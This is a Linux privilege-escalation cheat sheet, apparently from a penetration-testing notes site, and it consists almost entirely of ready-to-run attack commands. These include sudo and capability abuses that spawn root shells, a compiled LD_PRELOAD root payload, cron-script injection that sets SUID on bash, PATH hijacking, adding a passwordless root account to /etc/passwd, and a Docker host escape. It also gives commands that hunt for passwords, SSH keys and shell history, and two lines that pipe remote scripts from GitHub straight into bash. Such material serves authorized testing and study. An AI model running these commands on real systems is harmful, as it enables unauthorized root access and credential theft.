Skip to main content

Linux Privilege Escalation

Enumeration First

# OS & kernel
uname -a
cat /etc/os-release
cat /proc/version

# Current user
id
whoami
sudo -l            # What can we run as sudo?

# Users on system
cat /etc/passwd
cat /etc/shadow    # Needs root
cat /etc/group

# Logged-in users
who
w
last

SUID / SGID Binaries

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null

# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null

# Both
find / -perm /6000 -type f 2>/dev/null

# Check GTFOBins for abuse: https://gtfobins.github.io/

Sudo Abuse

# List sudo rights
sudo -l

# Common abusable sudo entries (check GTFOBins)
sudo find . -exec /bin/bash \;
sudo vim -c '!bash'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo less /etc/passwd   # then: !/bin/bash
sudo man man            # then: !/bin/bash

# env_keep and LD_PRELOAD
# If sudo -l shows: env_keep+=LD_PRELOAD
cat > /tmp/priv.c << EOF
#include <stdio.h>
#include <stdlib.h>
void _init() { setuid(0); system("/bin/bash"); }
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/priv.so /tmp/priv.c
sudo LD_PRELOAD=/tmp/priv.so find

Cron Jobs

# List cron jobs
cat /etc/crontab
ls /etc/cron.d/
ls /etc/cron.daily/
crontab -l
cat /var/spool/cron/crontabs/root 2>/dev/null

# Check for writable scripts run by root cron
# If a cron job runs a writable script:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
# Wait for cron, then:
bash -p

Writable Files & Paths

# World-writable files
find / -writable -type f 2>/dev/null | grep -v proc

# Writable directories
find / -writable -type d 2>/dev/null

# PATH hijacking
# If a SUID binary calls a command without full path:
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./vulnerable_suid_binary

# Writable /etc/passwd
# Add root user: new:x:0:0:root:/root:/bin/bash
echo 'hacked::0:0:root:/root:/bin/bash' >> /etc/passwd
su hacked

Capabilities

# Find binaries with capabilities
getcap -r / 2>/dev/null

# Common exploitable capabilities
# cap_setuid+ep on python3:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

# cap_net_raw+ep → sniff traffic
# cap_dac_read_search+ep → read any file

Kernel Exploits

# Get kernel version
uname -r

# Search for exploits
searchsploit linux kernel 4.4
# OR use: https://github.com/mzet-/linux-exploit-suggester

# Download and run suggester
curl -s https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash

Password Files & Sensitive Data

# Config files with passwords
grep -r "password" /etc/ 2>/dev/null
grep -r "passwd" /var/www/ 2>/dev/null
grep -rn "DB_PASS\|db_password\|SECRET" /var/www/ 2>/dev/null

# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
cat ~/.bash_history

# Web server configs
cat /etc/apache2/sites-enabled/*.conf
cat /etc/nginx/sites-enabled/*

Docker / LXC Escape

# Check if in container
cat /proc/1/cgroup | grep docker
ls /.dockerenv

# If in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Privileged container escape
mount /dev/sda1 /mnt
chroot /mnt

Automated Tools

# LinPEAS (most comprehensive)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash

# LinEnum
./LinEnum.sh -s -k password -r report -e /tmp/ -t

# Linux Smart Enumeration
./lse.sh -l 1    # level 1 (default)
./lse.sh -l 2    # level 2 (more verbose)